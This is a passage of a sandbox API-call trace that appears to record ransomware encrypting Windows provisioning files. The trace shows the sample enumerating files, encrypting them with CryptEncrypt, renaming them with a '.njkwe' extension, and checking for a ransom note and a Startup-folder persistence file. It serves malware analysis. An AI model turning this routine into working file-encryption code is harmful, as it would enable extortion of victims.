lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\238__Connections_Cellular_Alfa (Lebanon)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\238__connections_cellular_alfa (lebanon)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.524] GetProcessHeap () returned 0xbe0000 [0077.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.524] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x908d698d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x908d698d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x908d698d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x30e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml", cAlternateFileName="239__C~1.PRO")) returned 1 [0077.524] lstrcmpiW (lpString1="239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.524] lstrcmpiW (lpString1="239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.524] lstrcmpiW (lpString1="239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.524] lstrcmpiW (lpString1="239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.524] lstrcmpiW (lpString1="239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.524] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml") returned 163 [0077.524] StrStrIW (lpFirst="239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.524] lstrcmpW (lpString1="239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.524] lstrcmpW (lpString1="239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.524] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\239__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.524] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\239__connections_cellular_mtc touch (lebanon)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.527] GetTickCount () returned 0x1153b6f [0077.527] GetTickCount () returned 0x1153b6f [0077.527] GetTickCount () returned 0x1153b6f [0077.527] GetTickCount () returned 0x1153b6f [0077.527] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.527] GetProcessHeap () returned 0xbe0000 [0077.527] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.527] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x30e, lpOverlapped=0x0) returned 1 [0077.532] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.532] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x30e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x30e, lpOverlapped=0x0) returned 1 [0077.533] GetProcessHeap () returned 0xbe0000 [0077.533] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.533] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.533] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.533] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.533] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.533] CloseHandle (hObject=0x43c) returned 1 [0077.533] GetProcessHeap () returned 0xbe0000 [0077.533] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.533] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.533] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\239__connections_cellular_mtc touch (lebanon)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\239__Connections_Cellular_MTC Touch (Lebanon)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\239__connections_cellular_mtc touch (lebanon)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.534] GetProcessHeap () returned 0xbe0000 [0077.534] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.534] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901892f8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901892f8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901892f8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="23__CO~1.PRO")) returned 1 [0077.536] lstrcmpiW (lpString1="23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.536] lstrcmpiW (lpString1="23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.536] lstrcmpiW (lpString1="23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.536] lstrcmpiW (lpString1="23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.536] lstrcmpiW (lpString1="23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.536] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml") returned 166 [0077.537] StrStrIW (lpFirst="23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.537] lstrcmpW (lpString1="23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.537] lstrcmpW (lpString1="23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.537] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\23__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.537] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\23__connections_cellular_vodafone au (australia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.537] GetTickCount () returned 0x1153b7f [0077.537] GetTickCount () returned 0x1153b7f [0077.537] GetTickCount () returned 0x1153b7f [0077.537] GetTickCount () returned 0x1153b7f [0077.537] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.537] GetProcessHeap () returned 0xbe0000 [0077.537] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.537] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0077.539] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.539] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0077.539] GetProcessHeap () returned 0xbe0000 [0077.539] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.539] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.539] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.539] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.539] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.539] CloseHandle (hObject=0x43c) returned 1 [0077.539] GetProcessHeap () returned 0xbe0000 [0077.539] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.540] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0077.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\23__connections_cellular_vodafone au (australia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\23__Connections_Cellular_Vodafone AU (Australia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\23__connections_cellular_vodafone au (australia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.540] GetProcessHeap () returned 0xbe0000 [0077.540] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.540] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x908fcbf9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x908fcbf9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x908fcbf9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml", cAlternateFileName="240__C~1.PRO")) returned 1 [0077.540] lstrcmpiW (lpString1="240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.540] lstrcmpiW (lpString1="240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.540] lstrcmpiW (lpString1="240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.540] lstrcmpiW (lpString1="240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.540] lstrcmpiW (lpString1="240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.540] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml") returned 169 [0077.540] StrStrIW (lpFirst="240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.540] lstrcmpW (lpString1="240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.542] lstrcmpW (lpString1="240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.542] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\240__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.542] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\240__connections_cellular_vodacom lesotho (lesotho)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.542] GetTickCount () returned 0x1153b7f [0077.542] GetTickCount () returned 0x1153b7f [0077.542] GetTickCount () returned 0x1153b7f [0077.542] GetTickCount () returned 0x1153b7f [0077.542] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.542] GetProcessHeap () returned 0xbe0000 [0077.542] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.542] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0077.589] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.589] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0077.589] GetProcessHeap () returned 0xbe0000 [0077.589] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.589] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.589] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.589] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.590] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.590] CloseHandle (hObject=0x43c) returned 1 [0077.590] GetProcessHeap () returned 0xbe0000 [0077.590] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.590] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0077.590] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\240__connections_cellular_vodacom lesotho (lesotho)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\240__Connections_Cellular_Vodacom Lesotho (Lesotho)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\240__connections_cellular_vodacom lesotho (lesotho)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.591] GetProcessHeap () returned 0xbe0000 [0077.591] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.591] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x908fcbf9, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x908fcbf9, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x908fcbf9, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml", cAlternateFileName="241__C~1.PRO")) returned 1 [0077.591] lstrcmpiW (lpString1="241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.591] lstrcmpiW (lpString1="241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.591] lstrcmpiW (lpString1="241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.591] lstrcmpiW (lpString1="241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.591] lstrcmpiW (lpString1="241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.591] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml") returned 159 [0077.591] StrStrIW (lpFirst="241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.591] lstrcmpW (lpString1="241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.591] lstrcmpW (lpString1="241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.591] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\241__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.591] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\241__Connections_Cellular_Libyana (Libya)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\241__connections_cellular_libyana (libya)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.592] GetTickCount () returned 0x1153bbd [0077.592] GetTickCount () returned 0x1153bbd [0077.592] GetTickCount () returned 0x1153bbd [0077.592] GetTickCount () returned 0x1153bbd [0077.592] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.592] GetProcessHeap () returned 0xbe0000 [0077.592] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.592] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2bc, lpOverlapped=0x0) returned 1 [0077.594] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.594] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2bc, lpOverlapped=0x0) returned 1 [0077.594] GetProcessHeap () returned 0xbe0000 [0077.594] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.594] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.594] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, 